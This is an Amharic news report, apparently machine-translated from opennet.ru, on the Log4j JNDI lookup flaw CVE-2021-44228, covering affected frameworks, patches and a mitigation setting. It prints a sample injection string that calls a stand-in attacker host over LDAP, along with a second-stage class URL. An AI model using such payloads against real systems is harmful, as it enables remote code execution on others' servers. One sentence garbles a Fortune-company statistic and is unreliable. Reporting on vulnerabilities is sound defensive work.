በጃቫ አፕሊኬሽኖች ውስጥ መግባትን ለማደራጀት ታዋቂ በሆነው Apache Log4j ውስጥ በ«{jndi:URL}» ቅርጸት ልዩ ቅርጸት ያለው እሴት ወደ ምዝግብ ማስታወሻው ሲጻፍ የዘፈቀደ ኮድ እንዲተገበር የሚያስችል ወሳኝ ተጋላጭነት ተለይቷል። ጥቃቱ ከውጭ ምንጮች የተቀበሉትን ዋጋዎች በሚመዘግቡ የጃቫ አፕሊኬሽኖች ላይ ሊደረግ ይችላል, ለምሳሌ, በስህተት መልዕክቶች ውስጥ ችግር ያለባቸው እሴቶችን ሲያሳዩ.
እንደ Apache Struts፣ Apache Solr፣ Apache Druid ወይም Apache Flink ያሉ ማዕቀፎችን የሚጠቀሙ ሁሉም ፕሮጀክቶች ማለት ይቻላል በችግሩ የተጠቃ ሲሆን ከእነዚህም መካከል Steam፣ Apple iCloud፣ Minecraft ደንበኞች እና አገልጋዮች ይገኙበታል። ተጋላጭነቱ በድርጅታዊ አፕሊኬሽኖች ላይ ወደ ከፍተኛ ጥቃቶች ማዕበል ሊያመራ ይችላል ተብሎ ይጠበቃል ፣ በ Apache Struts ማዕቀፍ ውስጥ ያሉ ወሳኝ ተጋላጭነቶች ታሪክን ይደግማል ፣ ይህም እንደ ግምታዊ ግምት ፣ በድር መተግበሪያዎች ውስጥ በ Fortune 65% ጥቅም ላይ ይውላል። 100 ኩባንያዎች አውታረ መረቡን ለአደጋ የተጋለጡ ስርዓቶችን ለመፈተሽ ሙከራዎችን ጨምሮ።
አንድ የሥራ ብዝበዛ አስቀድሞ ታትሞ በመቆየቱ ችግሩ ተባብሷል, ነገር ግን ለተረጋጋ ቅርንጫፎች ጥገናዎች ገና አልተዘጋጁም. CVE ለዪው ገና አልተመደበም። ማስተካከያው በሎግ4j-2.15.0-rc1 የሙከራ ቅርንጫፍ ውስጥ ብቻ ተካትቷል። ተጋላጭነትን ለመዝጋት እንደ መፍትሄ የሎግ4j2.formatMsgNoLookups ግቤትን ወደ እውነት ማዋቀር ይመከራል።
ችግሩ የተፈጠረው log4j ልዩ ጭምብሎችን "{}" በማዘጋጀት ወደ ሎግ በሚወጡት መስመሮች ውስጥ በመደገፉ የJNDI (Java Naming and Directory Interface) መጠይቆች ሊከናወኑ በመቻላቸው ነው። ጥቃቱ "${jndi:ldap://attacker.com/a}" በሚለው ምትክ ሕብረቁምፊውን ለማለፍ ይቀንሳል፣ የትኛው log4j ወደ ጃቫ ክፍል የሚወስደውን መንገድ ወደ አጥቂ.com አገልጋይ የኤልዲኤፒ ጥያቄን እንደሚልክ . በአጥቂው አገልጋይ የተመለሰው መንገድ (ለምሳሌ http://second-stage.attacker.com/Exploit.class) አሁን ባለው ሂደት ውስጥ ተጭኖ የሚተገበር ሲሆን ይህም አጥቂው የዘፈቀደ ኮድ እንዲፈጽም ያስችለዋል. አሁን ካለው መተግበሪያ መብቶች ጋር ስርዓት.
ተጨማሪ 1፡ ተጋላጭነቱ ለዪ CVE-2021-44228 ተሰጥቷል።
ተጨማሪ 2፡ በመልቀቂያ log4j-2.15.0-rc1 የተጨመረውን ጥበቃ የሚያልፍበት መንገድ ተለይቷል። አዲስ ዝማኔ፣ log4j-2.15.0-rc2፣ ከተጋላጭነት የበለጠ የተሟላ ጥበቃ ለማድረግ ቀርቧል። ኮዱ በስህተት የተቀረፀ የJNDI ዩአርኤልን የመጠቀም ሁኔታ ላይ ያልተለመደ መቋረጥ ከሌለ ጋር የተያያዘውን ለውጥ ያደምቃል።
ምንጭ: opennet.ru